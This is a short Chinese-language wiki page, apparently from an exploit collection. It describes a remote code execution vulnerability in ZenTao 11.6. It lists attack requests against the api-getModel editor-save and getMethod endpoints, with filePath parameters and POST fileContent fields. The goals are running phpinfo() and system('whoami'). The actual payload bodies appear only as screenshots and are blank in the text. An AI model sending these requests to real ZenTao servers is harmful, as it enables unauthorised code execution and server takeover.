禪道_11.6_遠程代碼執行漏洞

# 禪道 11.6 遠程代碼執行漏洞
==漏洞利用==

===遠程代碼執行命令phpnifo();===

http://127.0.0.1/zentaopms/www/api-getModel-editor-save-filePath=1111

POST: fileContent=

![](/static/pwnwiki/img/20200909170608141.png )

====Payload2====

http://127.0.0.1/zentaopms/www/ api-getModel-api-getMethod-filePath=1111/1

POST: fileContent=

![](/static/pwnwiki/img/20200909170608208.png )

===遠程代碼執行命令system('whoami');===

====Payload1====

http://127.0.0.1/zentaopms/www/api-getModel-editor-save-filePath=2222

POST: fileContent=

![](/static/pwnwiki/img/20200909170608153.png )

====Payload2====

http://127.0.0.1/zentaopms/www/ api-getModel-api-getMethod-filePath=2222/2

POST: fileContent=

![](/static/pwnwiki/img/20200909170608326.png )

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容